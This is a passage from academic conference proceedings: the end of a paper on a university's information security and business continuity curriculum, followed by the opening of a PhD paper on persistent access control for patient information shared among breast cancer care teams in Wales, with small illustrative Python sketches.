regulatory process, societal norms, markets such as price structures, and finally through the<br />
architecture of cyberspace, or its code (Lessig 1999; Lessig 1995; Bellia et al., 2007).<br />
The role of private entities in cyberspace as a source of regulatory control continues to create<br />
controversy. For example, domain names are controlled by a privately owned entity, the Internet<br />
Corporation for Assigned Names and Numbers (ICANN), that has been making policy for the past ten<br />
years in cooperation with the U.S. Department of Commerce (DoC) (Froomkin 2000). Important<br />
questions arise concerning government oversight and whether any constitutional norms might be<br />
applied to check the activities of these private entities, or whether oversight mechanisms could be<br />
adopted by legislatures (Bellia et al., 2007).<br />
U.S. Government surveillance under the Wiretap Act, the Electronic Communications Privacy Act<br />
and the Foreign Intelligence Surveillance Act (FISA) is a critical topic for information security,<br />
and the case law provides an excellent basis for discussing when particular conduct<br />
constitutes a violation of national security. Some scholars believe that all current contracts should<br />
require defense contractors to protect their IT infrastructure to allow DOD evaluation assessments of<br />
the compliance in this area. Others have suggested that Congress should enact a national defenseoriented<br />
statute that mirrors the Department of Homeland Security (DHS) statutes related to our<br />
domestic security (Brown 2009).<br />
In the leading case of Ashcroft v. ACLU, Justice Thomas concluded that website operators should be<br />
responsible for standards of conduct that exist wherever the site is accessible (Ashcroft v. ACLU<br />
2002). This is a significant decision considering that most websites have servers in many locations<br />
around the world.<br />
International Responsibility<br />
Tanya Zlateva et al.<br />
In addition to understanding U.S. information security law, our students should recognize that, to the<br />
extent that cyber terrorists commit cross-border attacks, international law will be at the forefront of<br />
responding to these attacks (Lentz 2010). The passage of United Nations Security Council Resolution<br />
1373 created an international law duty requiring all states to prevent and respond to cyber<br />
terrorist acts: States must, among other actions, take the necessary steps to prevent the commission of<br />
terrorist acts, deny safe haven to those who finance, plan, support or commit terrorist acts, ensure<br />
that any person who participates in the financing, planning, or perpetration of terrorist acts is brought<br />
to justice, and afford one another the greatest measure of assistance in connection with criminal<br />
investigations or proceedings.<br />
4.2 Business continuity, security, and risk management<br />
Business continuity traditionally focuses on the organizational processes that evaluate risks and develop<br />
plans at the strategic, tactical and operational levels to ensure the uninterrupted continuation of the<br />
business process. It is a broad management domain distinct from information security, but one that<br />
has substantive relationships with issues of information classification and preservation as well as the<br />
sources of system vulnerabilities and threats. The specialization in Business Continuity, Security and<br />
Risk Management includes three required courses and a related elective (Boston University, 2010b).<br />
The core curriculum builds an academically solid foundation through discussions of specific industry<br />
needs. The required courses proceed from an overview of central issues and assessment approaches<br />
to details of risk planning and strategy and the development of emergency response plans as follows:<br />
Introduction to Business Continuity, Security, and Risk Management (AD610) is an overview<br />
course that examines management issues involved in assessing the security and risk<br />
environments in both the private and public sectors in order to assure continuous system-wide<br />
operations. The course studies the elements of risk assessment and operational continuity and<br />
exposes the role of the firm in crisis response and management as well as the terms, systems,<br />
and interactions necessary to assure continuous operations.<br />
System-Wide Risk Planning, Strategy, and Compliance (AD613) explores issues relating to<br />
corporate and organizational security and risk from both the perspective of systems designed to<br />
protect against disasters and aspects of emergency preparedness should systems fail. The<br />
course discusses proactive risk assessment, designing and implementing a global assurance<br />
plan, including control measures to assess the plan’s degree of success. The course also<br />
provides explanations of legal/regulatory, auditing, and industry-specific requirements related to<br />
compliance, control, and reporting issues in business risk management. The role of establishing<br />
and maintaining standards by local, national, and international agencies is discussed, as is the<br />
importance of these agencies in certifying operations.<br />
Incident Response and Disaster Recovery (AD614) builds on the concepts introduced in the<br />
previous two courses and applies them in more detail mainly to the corporate-private sector<br />
environment. The focus is on organization and processes necessary to effectively respond to and<br />
manage incidents, including the transition from emergency response and incident management to<br />
business recovery. Disaster recovery is discussed with an emphasis on technology recovery.<br />
The elective course gives students flexibility to pursue their individual interests in one of three areas:<br />
emergency management, project risk and cost management, and IT security policies and procedures,<br />
through the following courses:<br />
COO-Public Emergency Management (AD612) examines emergency management from national,<br />
state, local, and family perspectives of prevention, preparedness, response, and recovery. The<br />
course encompasses knowledge of the specific agencies, organizations, and individual behaviors<br />
in emergency management as well as the interlinking partnerships between these groups. Areas<br />
of discussion include: responsibilities at federal, state, community and individual levels; guidelines<br />
and procedures for operations and compliance, such as the National Response Plan; Incident<br />
Command Systems (ICS); plan development, command, and control; communication; partnership<br />
development and maintenance; and leadership.<br />
Project Risk and Cost Management (AD644) presents approaches to managing the components<br />
of a project to assure it can be completed through both general and severe business disruptions<br />
on local, national, and international levels. Important aspects include cost management, early cost<br />
estimation, detailed cost estimation, and cost control using the earned value method.<br />
IT Security Policies and Procedures (CS684), which was discussed in section 2.<br />
5. Pedagogy, educational technologies and flexible delivery formats<br />
The maturing of the field and the great diversity of student backgrounds naturally led to the need for a<br />
more imaginative and more participatory pedagogy. We were especially concerned with teaching our<br />
students how to relate concepts from different areas and apply them to real-world problems. To<br />
achieve this we developed a series of virtual laboratories that provide an environment for applying<br />
theoretical concepts, testing different approaches, and assuming alternative roles in various<br />
scenarios (Zlateva et al., 2008; Hylkema et al., 2010). Student reflections indicate that the new technologies<br />
enhance understanding and further communication and team building.<br />
Finally, we also needed to address the problem of making our programs accessible through flexible<br />
delivery formats. We have considerable experience with such formats: first with a blend of<br />
in-class and online instruction in 2000 (Zlateva et al., 2001), and since 2003 a fully online MS in CIS program.<br />
The online version of the security concentration was introduced in 2005. There are significant<br />
differences in the preparation and delivery of a face-to-face and an online course. One of the<br />
most important factors for successful teaching and learning online is the ability to create meaningful<br />
and close student-teacher and student-student interaction. Towards this goal we introduced video-conferencing<br />
tools that were used for discussion and review sessions with the instructor, and also by<br />
student teams working on a project. The feedback from students and faculty is overwhelmingly<br />
positive and we are currently developing use cases that reflect best practices for these<br />
technologies.<br />
6. Conclusions and future work<br />
Over the last eight years we have developed a comprehensive curriculum for security education. The core<br />
ensures an in-depth discussion of the security of operating systems, software and networks, as well as<br />
security policies and procedures. This core is complemented by concentration electives in digital<br />
forensics, biometrics and advanced cryptography, and by security modules in high-level courses such as<br />
web technologies, enterprise computing, data mining, and health informatics. The information security<br />
programs are linked to the programs of business continuity that provide much needed management<br />
context. From a methodological point of view great care is taken to relate abstract theory to practical<br />
skills and team work by using virtual laboratories and video-collaboration tools. Overall the curriculum<br />
introduces analytical dialogue, creative concepts and critical pedagogical methodologies to advance<br />
student learning.<br />
References<br />
Ashcroft v. ACLU 542 U.S. 656 (2004).<br />
Boston University (2010a) Information Security Programs (http://www.bu.edu/csmet/academic-programs/ ) and<br />
Course Descriptions (http://www.bu.edu/csmet/academic-programs/courses/)<br />
Boston University (2010b) Business Continuity, Security and Risk Management<br />
http://www.bu.edu/online/online_programs/graduate_degree/master_management/emergency_managemen<br />
t/courses.shtml<br />
Bellia, P.L., Berman, P.S. & Post, D.G. (2007). Cyberlaw: Problems of Policy and Jurisprudence in the<br />
Information Age, 4-10, St. Paul, MN: Thompson/West.<br />
Brown, T.A. (Lt. Col.) (2009). Sovereignty in Cyberspace: Legal Propriety of Protecting Defense Industrial Base<br />
Information Infrastructure, 64 A.F.L. Rev. 21, 256-257.<br />
Cavusoglu, H., Mishra, B. and Raghunathan, S. (2004). "The effect of Internet security breach announcements on<br />
market value: capital market reactions for breached firms and Internet security developers," International<br />
Journal of Electronic Commerce, Vol. 9, Number 1, pp. 69-104.<br />
Chabinsky, S. R. (2010). Cybersecurity Strategy: A Primer for Policy Makers and Those on the Front Line, 4 J.<br />
Nat'l Security L. & Pol'y 27, 38.<br />
Chander, A. (2002). Whose Republic? 69 U. Chi. L. Rev. 1479.<br />
Clarke, R.A. (2010). Cyber War, New York: Harper Collins.<br />
Cohen, A. (2010). Cyberterrorism: Are we Legally Ready? 9 J. Int'l bus. & L. 1, 40.<br />
Downing, R.W. (2005). Shoring up the Weakest Link: What Lawmakers Around the World Need to Consider in<br />
Developing Comprehensive Laws to Combat Cybercrime, 43 Colum. J. Transnat’l L. 705, 716-19.<br />
Hylkema, M., Zlateva, T., Burstein, L. and Scheffler, P (2010). Virtual Laboratories for Learning Real World<br />
Security - Operating Systems. Proc. 14th Colloquium for Information Systems Security Education,<br />
Baltimore, MD June 7 – 9.<br />
Kerr, O.S. (2003). Cybercrime's Scope: Interpreting 'Access' and 'Authorization' in Computer Misuse Statutes, 78<br />
NYU Law Review No. 5, 1596, 1621 (citing various state and federal statutes defining "access").<br />
Lentz, C.I. (2010). A State's Duty to Prevent and Respond to Cyberterrorist Acts, 10 Chi. J. Int'l L. 799, 822-823.<br />
275
Tanya Zlateva et al.<br />
Lessig, L. (1995). The Path of Cyberlaw, 104 Yale L.J. 1743, 1743-45.<br />
Lessig, L. (1999). The Law of the Horse: What Cyberlaw Might Teach, 113 Harv. L. Rev. 501, 509.<br />
Moses, L.B. (2007). Recurring Dilemmas: The Law’s Race to Keep Up With Technological Change, University of<br />
Illinois Journal of Law, Technology & Policy, The Board of Trustees of the University of Illinois, 7 U. Ill. J.L.<br />
Tech. & Policy 239, 241-243.<br />
Zlateva, T., Burstein, L., Temkin, A., MacNeil, A. and Chitkushev, L. (2008): Virtual Laboratories for Learning<br />
Real World Security. Proceedings of the Colloquium for Information Systems Security Education, Society for<br />
Advancing Information Assurance and Infrastructure Protection, Dallas, Texas, June 2-4, 2008.<br />
Zlateva, S., Kanabar, V., Temkin, A., Chitkushev, L. and Kalathur, S. (2003): Integrated Curricula for Computer<br />
and Network Security Education, Proceedings of the Colloquium for Information Systems Security<br />
Education, Society for Advancing Information Assurance and Infrastructure Protection, Washington, D.C.,<br />
June 3-5, 2003.<br />
Zlateva, T. and Burstein, J. (2001): "A Web-Based Graduate Certificate for IT Professionals - Design Choices and First<br />
Evaluation Results". Proceedings of the 2001 Annual Conference of the American Society for Engineering<br />
Education (ASEE), June 24-27, Albuquerque, New Mexico. http://soa.asee.org/paper/conference/paperview.cfm?id=16617<br />
PhD Research Papers<br />
Towards Persistent Control over Shared Information in a<br />
Collaborative Environment<br />
Shada Alsalamah, Alex Gray and Jeremy Hilton<br />
Cardiff University, UK<br />
S.A.Salamah@cs.cardiff.ac.uk<br />
W.A.Gray@cs.cardiff.ac.uk<br />
Jeremy.hilton@cs.cardiff.ac.uk<br />
Abstract: In a complex collaborative environment, such as healthcare, where Multi-Disciplinary care Team<br />
(MDT) members and information come from independent organisational domains, there is a need for information-sharing<br />
across the organisations’ information systems in order to achieve the overall goal of collaboration.<br />
The inability to provide a secure communication method giving local/global protection affects inter-professional<br />
communication and hinders sharing among MDT members. This research aims to facilitate a secure<br />
collaborative environment enabling persistent control over shared information across boundaries of the<br />
organisations that own the data. This paper is based on the early stages of the research and its results will feed<br />
into following stages. It looks at the structure of a healthcare system to understand the types of inter-professional<br />
communication and information exchange that occur in practice. Additionally it presents an initial assessment<br />
identifying the Information Security (IS) needs and challenges faced in providing persistent control in a shared<br />
collaborative environment by using conceptual modelling of a selected medical scenario (breast cancer in<br />
Wales). The results show that a considerable number of professionals are involved in a patient’s treatment. Each<br />
plays a well-defined role, but often uses different Healthcare Information Systems (HIS) to store sensitive and<br />
confidential patient medical information. These HISs cannot provide secure multi-organisational information-sharing<br />
to support collaboration among the MDT members. This causes inter-professional communication issues<br />
among team members that inhibit decision-making using the information. The findings from this study show how<br />
information support for MDT members from HIS-stored information can be improved. The resulting IS functions,<br />
which facilitate establishing secure collaborative environments guaranteeing persistent control over<br />
shared information, are also described.<br />
Keywords: information security, information system, information sharing, multi-disciplinary team, persistent<br />
control, secure collaborative environment<br />
1. Introduction<br />
Current innovation in Information and Communication Technology (ICT) has encouraged collaboration<br />
within and among different fields, including healthcare, leading to novel inventions and enabling work<br />
on large-scale scientific problems. Such collaboration often demands extensive sharing of<br />
different resources among collaborating organisations in order to achieve an overall goal (Park and<br />
Sandhu, 2002; Wasson and Humphrey, 2003; Yau and Chen, 2008). It may involve<br />
information in distributed resources being used and shared by users from geographically and<br />
administratively distributed physical organisations that own the resources. Across all sites, these<br />
collaborations form Virtual Organisations (VOs) (Wasson and Humphrey, 2003; Yau and Chen, 2008).<br />
Therefore, a key characteristic of a VO is that users and information may come from different<br />
organisations, and thus various administrative domains (Thompson et al., 2003) with each applying<br />
local Information Security (IS) rules to protect its own information. As a result, when these<br />
organisations come together in a VO, they demand a Secure Collaborative Environment (SCE) for<br />
sharing resources, mainly information and data. However, there are three possible levels of protection<br />
when user(a) in domain(a) needs to share information with user(b) in domain(b) outside its secured<br />
administrative domain(a).<br />
Level 1 is local to domain(a) - user(a) loses control over the information once it is shared as the<br />
protection level applied inside domain(a) using IS rules(a) is not guaranteed outside this domain<br />
(once it has passed to domain(b) where IS rules(a) are not applied).<br />
Level 2 allows user(a) to have static control over the shared information when its protection is<br />
assured by user(b) using IS rules(b) when inside domain(b). (Here user(a) passes control to<br />
user(b), and although the information will still be protected, the rules applied change once the<br />
information is received, since user(a) has no control over domain(b)’s protection authority. Thus if<br />
the protection level of original information changes in domain(a), there is no guarantee that<br />
user(b) will also change it on the shared version of this information in domain(b). Additionally, if<br />
user(b) changes the protection on the shared version, user(a) cannot retain control).<br />
Level 3 allows dynamic control. It enables persistent control over information anywhere outside<br />
domain(a), including domain(b), using the rules(a) by communicating rules(a) along with the<br />
shared information. Furthermore, persistent control, in this context, enables synchronisation of<br />
any changes made regarding the protection level of the original information in domain(a) with the<br />
shared version of the information in domain(b). This guarantees user(a) full control at all times<br />
by sustaining the original information protection level outside its domain and making it remotely<br />
editable. In this context, only this final protection level creates an SCE in a VO; therefore, a<br />
collaborative environment with multiple independent domains is referred to as an SCE when<br />
each domain has persistent control over its shared information.<br />
Based on this, we can differentiate between levels 2 and 3 in that dynamic control creates an SCE,<br />
whereas static control does not. This is because the latter leaves the information out of both<br />
users’ control at the point when it leaves domain(a) and before being received at domain(b), although<br />
it is secured otherwise.<br />
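To make the difference between static (Level 2) and dynamic (Level 3) control concrete, a shared copy under dynamic control can be modelled as consulting the owner's live rules on every access, rather than carrying a frozen snapshot of them. The following minimal Python sketch is illustrative only: the `Policy` and `SharedItem` names are our own, and an in-process object reference stands in for the cross-domain communication of rules(a) alongside the shared information.<br />

```python
from dataclasses import dataclass


@dataclass
class Policy:
    """IS rules defined by the owning domain(a); hypothetical structure."""
    allowed_roles: set


@dataclass
class SharedItem:
    """A copy shared into domain(b) that references the owner's live policy."""
    content: str
    policy: Policy  # reference back to domain(a)'s rules, not a snapshot

    def accessible_by(self, role: str) -> bool:
        # Every access check consults domain(a)'s current rules (Level 3),
        # so a change made by the owner takes effect on all shared copies.
        return role in self.policy.allowed_roles


# domain(a) defines its rules and shares an item with domain(b)
rules_a = Policy(allowed_roles={"oncologist", "radiologist"})
item = SharedItem("scan report", rules_a)

print(item.accessible_by("radiologist"))   # True
rules_a.allowed_roles.discard("radiologist")  # owner tightens rules(a)
print(item.accessible_by("radiologist"))   # False: revocation propagates
```

Under static (Level 2) control, `SharedItem` would instead store a copy of `allowed_roles` taken at sharing time, and the owner's later revocation would not reach domain(b). In a real VO the object reference would be replaced by a synchronisation channel for the policy, which is precisely what persistent control requires.<br />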
In fact, static and dynamic levels of information protection could suit different scenarios based on the<br />
information protection level required. This paper explores the need for SCEs in VOs and the<br />
challenges in implementing this environment by investigating a representative example of a VO,<br />
namely the healthcare scenario. This paper is based on a case-study scenario carried out in this<br />
naturally complex environment, where healthcare professionals from different organisations critically<br />
need to collaborate and have control over exchanged medical information when treating a patient with<br />
breast cancer in Wales, UK. The remainder of the paper is divided into five main sections, covering the<br />
problem statement, the method for understanding the problem, the results, a discussion of the results,<br />
and the conclusion.<br />
2. Problem statement<br />
In this scenario, the patient treatment delivery model is shifting from a disease-centric approach<br />
towards one that is patient-centric (Allam, 2006; Al-Salamah et al., 2009), and considers the patient’s<br />
medical condition as a whole rather than by managing patients as having separate diagnosed<br />
diseases, each treated by different professionals (Department of Health, 1997; Pirnejad, 2008; Al-<br />
Salamah et al., 2009). In a patient-centric approach, the patient is the central focus and is treated by a<br />
Multi-Disciplinary care Team (MDT) (Allam, 2006; Al-Salamah et al., 2009). This team consists of<br />
different healthcare professionals coming from different healthcare organisations to form a VO for<br />
patient treatment. This MDT, and hence the VO, evolves over time in response to the patient’s<br />
changing medical condition. In addition, in order to organise the MDT work and assist the delivery of<br />
patient treatment, a visual and structured care plan, called an Integrated Care Pathway (ICP), is<br />
followed. This plan reflects an ideal, evidence-based patient treatment journey for the condition<br />
(Zander, 2002; Al-Salamah et al., 2009; Map of Medicine, 2010e). In the UK, ICPs are based on<br />
having regular MDT meetings to discuss the patient’s case and provide recommendations for the<br />
treatment management plan. This new approach is increasing the need for sharing medical<br />
information among MDT members as they work together on treating the patient. Consequently, this<br />
will possibly require the information to leave the systems where each member stores patient<br />
information (Smith and Eloff, 1999; Thompson et al., 2003; Beale, 2004; Pirnejad, 2008). The<br />
distributed nature of this collaboration demands an effective SCE that facilitates secure inter-professional<br />
communication among members exchanging often-sensitive information.<br />
HISs currently used in patient treatment are hindering inter-professional communication among MDT<br />
members in the health environment. The literature shows that healthcare suffers from poor inter-professional<br />
communication (Pirnejad, 2008), and this is a key factor contributing to medical errors<br />
(Mohyuddin et al., 2008; Al-Salamah et al., 2009). Indeed, research estimates an annual figure of<br />
850,000 medical errors occurring in NHS hospitals (Department of Health, 2000). These can lead to<br />
death, life-threatening illness, disability, admission to hospital, or prolongation of a hospital stay, as<br />
well as complications in treatment which, in most cases, might have been avoided<br />
if the patient had received ordinary standards of care (Department of Health, 2000; Aylin et al.,<br />
2004). Furthermore, the NHS spends around £400 million annually in settlement of clinical negligence<br />
claims, and has a potential liability of around £2.4 billion for existing and expected claims (Department<br />
of Health, 2000). However, a prime reason behind communication issues and medical errors in the<br />
healthcare environment is the limitation of HIS and ICT used in patient treatment (Smith and Eloff,<br />
1999; Commission for Health Improvement and Audit Commission, 2001; Anderson, 2008;<br />
Mohyuddin et al., 2008; Pirnejad, 2008; Al-Salamah et al., 2009; Skilton et al., 2009). These cause<br />
problems in data processing and representation, the amount of information they are capable of<br />
providing (Mohyuddin et al., 2008), and in communication at departmental, organisational, and even<br />
national levels (Al-Salamah et al., 2009). This is because some of these HISs were designed over 50<br />
years ago (Department of Health, 1997) and thus were tailored to meet the requirements of the<br />
disease-centric approach prevailing at that time (Al-Salamah et al., 2009; Skilton et al., 2009).<br />
Although legacy systems may be capable of providing local and static protection, in the new patient-focused<br />
approach they hinder communication and information-sharing, since protection is not<br />
guaranteed outside secured domains. As a result, information is only accessible within the secured<br />
domains where such HISs exist (Lillian, 2009), and the only methods of sharing are verbal communication<br />
or printed copies sent by post. In addition, despite the fact that ICT is used in some healthcare organisations to<br />
improve communication, in practice, the results did not meet expectations, because either the HIS<br />
failed to be implemented in the healthcare environment or could not achieve implementation<br />
objectives (Commission for Health Improvement and Audit Commission, 2001; Pirnejad, 2008).<br />
Finally, according to Anderson (2008: 3-11), although the security requirements of these systems vary<br />
in terms of the collection of authentication, transaction integrity and accountability, message secrecy,<br />
and covertness they use, many fail because system designers protect either the wrong information, or<br />
the right information but in the wrong way. See reported incidents and concerns in (Blackhurst, 2010;<br />
NursingTimes, 2010a; NursingTimes, 2010b; Sturcke and Campbell, 2010).<br />
Nevertheless, implementation of the new patient-centric approach demands an SCE. The HIS is not<br />
like any other information system because of the “patient” entity. It holds extensive information<br />
combining a patient’s biological details with social complexity (Beale, 2004). This information may<br />
contain personal (Office of Public Sector Information, 1998; Department of Health, 2003),<br />
embarrassing (Sturcke and Campbell, 2010), and critical medical information (National Institute for<br />
Healthcare and Clinical Excellence, 2002; Beale, 2004; Meystre, 2007). The nature of a customer or<br />
traveller’s information stored in a bank or airline system decays with age and normally once this<br />
information is published or exposed, protection is no longer required. Patient information, on the other<br />
hand, has a longevity characteristic (Beale, 2004) that will always render it highly sensitive (Smith and<br />
Eloff, 1999) and confidential (Department of Health, 2003); indeed, it is the type of information that will<br />
never expire even after the patient’s death. It is therefore critical to have constant protection with<br />
persistent control and the assurance that it will only be disclosed to the right person for permitted<br />
medical purposes (Department of Health, 2003). Since legacy HISs are not designed to achieve this,<br />
an SCE is essential to help members of MDTs share this information securely with persistent control.<br />
Most of the existing solutions attempt to protect information as long as it exists within the secured<br />
domain and when this information is shared across boundaries, it is no longer secured or controlled<br />
(Park and Sandhu, 2002; Burnap and Hilton, 2009; Nene and Swanson, 2009). Further examples are<br />
in (Chadwick, 2002; Alfieri, 2003). Furthermore, although several solutions are able to protect<br />
electronic information across domains such as Digital Rights Management and Usage Control (Park<br />
and Sandhu, 2002), they are either constrained by the number of uses and/or users (Nene and<br />
Swanson, 2009) or the control policy associated with the content cannot be modified by the<br />
information owner once disseminated (Thompson, et al., 2003). In fact, this is a vital issue that would<br />
prevent adapting to the dynamic nature of the VO environment, such as healthcare, where the need<br />
to protect the information is as important as the need for sharing it. For example, when members of<br />
the VO change their roles or one of the participating organizations goes out of existence, there will be<br />
a need to deny access to information previously shared (Burnap and Hilton, 2009). Therefore, these<br />
solutions are restricted and incapable of providing full protection with the flexibility of persistent<br />
control.<br />
However, enabling information-sharing across organisations with persistent control raises a number of<br />
IS issues and challenges that limit the effectiveness, dynamism, and potential of this collaborative<br />
working (Beale, 2004; Burnap and Hilton, 2009). Firstly, MDT members and information resources<br />
come from different organisations and administrative domains (Thompson et al., 2003). Although<br />
organisations adopt national good-practice guidelines and IS policies to protect in-house medical<br />
information, they adapt them to fit local needs and circumstances (Cancer Services Expert Group,<br />
2008). In other words, MDT members and the systems they use do not speak the same IS language<br />
either at the human or machine level. This makes interoperability difficult since there are no clear and<br />
precise IS policies and practice guidelines at a national level governing a VO-wide exchange of<br />
information. This may result in direct conflicts in terms of information access requirements between<br />
software applications of multiple vendors in use (Beale, 2004). Consequently, negotiating VO-wide<br />
agreements across organisations is often a lengthy and complex process (Thompson et al., 2003).<br />
Secondly, the collaboration demands extensive information-sharing among MDT members in order to<br />
assure the availability of relevant information in a continually changing scene. However, sharing<br />
sensitive information requires a focus on the person’s role in the treatment process, since different<br />
roles have different information requirements. This necessitates a careful balance between the<br />
availability of life-critical data and confidentiality of patient information so that it supports prompt<br />
reliable care without privacy violation. According to Beale (2004) and Anderson (2008: 3-11), these<br />
two requirements are in direct conflict, which makes this balance hard to achieve, even using<br />
traditional computer security mechanisms. Thirdly, the human side of the collaborative environment<br />
increases the complexity. In each organisation, professionals and other employees involved with the<br />
management, use, or operation of the resources within the domain are normally mandated to attend<br />
annual organisation-wide IS training sessions to inform personnel of IS risks associated with their<br />
activities and their responsibilities in complying with organisation policies and procedures designed to<br />
reduce such risk, as well as to manage resources and protect information. However, the absence of<br />
a VO-wide IS awareness means MDT members are unaware of the overall required IS needs of all<br />
involved organisations, and their responsibility to ensure information received from different<br />
organisations is protected and that its use is fit for purpose in the treatment. Fourthly, relevant medical<br />
information should be available across organisations seamlessly (Yau and Chen, 2008). Finally, there<br />
are additional existing technical, economic, political, ethical and logistical information ownership<br />
issues and barriers that hinder sharing across organisations (Smith and Eloff, 1999; Mandl et al.,<br />
2001; Beale, 2004; Cross, 2006).<br />
This research aims to address some of these issues and challenges by defining and implementing an<br />
approach that would help provide an SCE with persistent control. This should provide seamless remote<br />
access to information that reflects the changing roles of MDT members as the treatment progresses<br />
along the ICP, providing only relevant information to team members based on their current role<br />
in the treatment process. In addition, it should offer a common user-friendly set of IS rules to be used<br />
by MDT members from all involved organisations. These rules should be embedded in the information<br />
being shared in order to sustain the rules as defined by the information owner. Finally, having<br />
common IS rules will make it easier to raise MDT members’ awareness of their responsibilities for the<br />
protection of exchanged information. This will need to be developed in different research stages,<br />
starting with an understanding of the healthcare system and the information exchanges occurring in<br />
practice, to the investigation of the current information systems’ issues and MDT IS needs for the<br />
collaboration, and ending with a solution that would facilitate this secure sharing of information with<br />
persistent control.<br />
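The role- and stage-dependent filtering described above can be sketched in a few lines. This is an illustrative sketch only, not the system proposed in this paper; all record names, roles, and ICP stages below are hypothetical.

```python
# Illustrative sketch of stage- and role-based filtering for an SCE.
# Each shared item carries the rules set by its owning organisation:
# which roles may see it, and at which ICP stages it is relevant.
# All names here are hypothetical examples, not from the paper.
SHARED_RECORDS = [
    {"item": "clinical history", "roles": {"GP", "surgeon", "oncologist"},
     "stages": {"referral", "assessment", "treatment", "follow-up"}},
    {"item": "pathology report", "roles": {"pathologist", "oncologist", "surgeon"},
     "stages": {"assessment", "treatment"}},
    {"item": "follow-up plan", "roles": {"GP", "breast care nurse"},
     "stages": {"follow-up"}},
]

def visible_items(role, stage, records=SHARED_RECORDS):
    """Return only the items relevant to this role at this ICP stage."""
    return [r["item"] for r in records
            if role in r["roles"] and stage in r["stages"]]
```

For example, a GP at the follow-up stage would see the clinical history and the follow-up plan, but not the pathology report, which is relevant only to the specialist roles during assessment and treatment.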
3. Method<br />
We believe it is important to gain an understanding of the inter-professional communication and<br />
information exchange in practice through the study of a real-life scenario. The breast cancer scenario<br />
in Wales was selected as a healthcare system whose structure would be examined to understand:<br />
how MDT members communicate; how HISs are used by the MDT to achieve the overall treatment<br />
goal; how the information is generated and stored; and how it can be used to support collaboration. In<br />
addition, it will allow an initial assessment that will help identify the IS needs for the SCE with<br />
persistent control.<br />
Our reference scenario’s conceptual model is the ICP treatment journey for breast cancer treatment in<br />
Wales. It is divided into six parts (Map of Medicine, 2010a; Map of Medicine, 2010b; Map of Medicine,<br />
2010c; Map of Medicine, 2010d; Map of Medicine, 2010g; Map of Medicine, 2010h), which are taken<br />
from the Map of Medicine (2010i, 2010f, 2010e) and so follow its recommended ICP for this disease.<br />
Using conceptual modelling, we investigated the different healthcare professionals involved in the<br />
treatment of patients, as they carried out their tasks defined by their roles in the six parts of the ICP,<br />
the different HISs used to serve the patient’s treatment at each step, the medical information<br />
generated and stored in these HISs for each task, the IS policies applied, and the inter-professional<br />
communication between the MDT members. Part of the conceptual model that was derived from the<br />
breast cancer ICP (Map of Medicine, 2010h) is shown in Figure 1.<br />
Shada Alsalamah et al.<br />
Figure 1: Part of breast cancer treatment conceptual model<br />
4. Results<br />
Although the investigation is still under way, the following results have been found.<br />
First, according to the National Institute for Healthcare and Clinical Excellence (NICE) (2002), breast<br />
cancer diagnosis and treatment is a co-operative activity that involves a range of professionals, both<br />
within and outside the breast cancer unit. We found that there are at least 16 healthcare professionals<br />
involved in the treatment of a patient in this process in Wales. Although each plays a well-defined but<br />
different role, they are increasingly working in teams (Commission for Health Improvement and Audit<br />
Commission, 2001). Annually, each MDT diagnoses and treats 100 new breast cancer patients<br />
(NICE, 2002). The provision of a high quality service requires close co-operation between specialists<br />
from several disciplines and it is essential that care is provided by a breast cancer MDT in a specialist<br />
breast unit (Cancer Services Expert Group, 2008). In addition, there are at least two professionals for<br />
each role in the core breast care team (NICE, 2002). The different MDT members’ roles can be<br />
categorised into three different groups:<br />
Primary care personnel: GP, district nurse, and practice nurse.<br />
Principal specialist personnel (core breast cancer team): breast cancer nurse specialists, clinical<br />
and medical oncologists, radiologists, pathologists, and surgeons.<br />
Affiliated personnel: liaison psychiatrist and/or clinical psychologist, palliative care specialists and<br />
teams, physiotherapists and occupational therapists, surgeons experienced in breast<br />
reconstruction, clinical genetics, pharmacists, and haematologists.<br />
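The grouping above can be captured as a simple lookup structure. The sketch below simply mirrors the three groups listed in the text; membership is abbreviated and illustrative only.

```python
# The three MDT role groups identified in the text, as a lookup table.
# Role names are abbreviated; membership is illustrative, not exhaustive.
MDT_ROLE_GROUPS = {
    "primary care": {"GP", "district nurse", "practice nurse"},
    "principal specialist": {"breast cancer nurse specialist", "clinical oncologist",
                             "medical oncologist", "radiologist",
                             "pathologist", "surgeon"},
    "affiliated": {"liaison psychiatrist", "clinical psychologist",
                   "palliative care specialist", "physiotherapist",
                   "occupational therapist", "reconstructive surgeon",
                   "clinical geneticist", "pharmacist", "haematologist"},
}

def group_of(role):
    """Return the group a given role belongs to, or None if unknown."""
    for group, roles in MDT_ROLE_GROUPS.items():
        if role in roles:
            return group
    return None
```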
Second, there are at least seven HISs holding information about the patient with each having its own<br />
patient health record. This record stores sensitive and confidential personal and medical information.<br />
Although the HISs collectively adopt and adapt national guidelines, each applies its own distinct<br />
policies and guidelines locally. These meet local needs and circumstances (Cancer Services Expert<br />
Group, 2008). The seven HISs found in this scenario and the different types of medical records they<br />
might contain are listed in Table 1 in Appendix A.<br />
Finally, a crucial feature of the breast cancer MDT is its composition, the way it works, and the<br />
coordinated care it offers. This team functions in the context of a cancer unit or centre, which may<br />
consist of one or more sites using shared facilities (NICE, 2002). NICE (2002) and the Commission<br />
for Health Improvement and Audit Commission (CHIAC) (2001) revealed audit and anecdotal<br />
evidence of problems in inter-professional communication and a failure to plan care in a systematic<br />
way between the different professionals involved. Such problems have been linked with complaints<br />
and litigation (NICE, 2002). For example, GPs sometimes lose track of patients during the treatment<br />
period or become unable to discuss the diagnosis and prognosis with patients due to lack of<br />
information from consultants. Furthermore, primary personnel can be unaware that a patient has been<br />
discharged, sometimes without necessary services or equipment being arranged. It can be unclear<br />
whether the GP or consultant is responsible for patient follow-up after treatment. Furthermore, the<br />
HISs are poor in their support of day-to-day working arrangements, including communication,<br />
appointment systems and shared protocols (CHIAC, 2001). Indeed, even if the care team is ready to<br />
share medical information (CHIAC, 2001), the current HISs do not support this sharing of<br />
information (CHIAC, 2001; Skilton et al., 2009). Finally, although many trusts do not have agreed<br />
policies for the management of cancers, where policies do exist, it is unclear whether they are<br />
followed because practice is not audited (CHIAC, 2001). Furthermore, formal policies and plans<br />
cannot ensure that services are provided in a patient-centred way, without a change in the attitudes<br />
and behaviour of those working with patients (CHIAC, 2001).<br />
5. Discussion and future work<br />
These results identify the different roles of MDT members involved in the treatment of patients with<br />
breast cancer in Wales, the HISs involved, the types of health records created in these systems, and<br />
medical information stored in these different records. This information helped the development of an<br />
understanding of the emerging need for the SCE for MDT members involved in treating patients with<br />
breast cancer. For example, some of the tasks carried out as the patient proceeds through the breast<br />
cancer’s ICP show a clear redundancy in some of the information collected, including, but not limited<br />
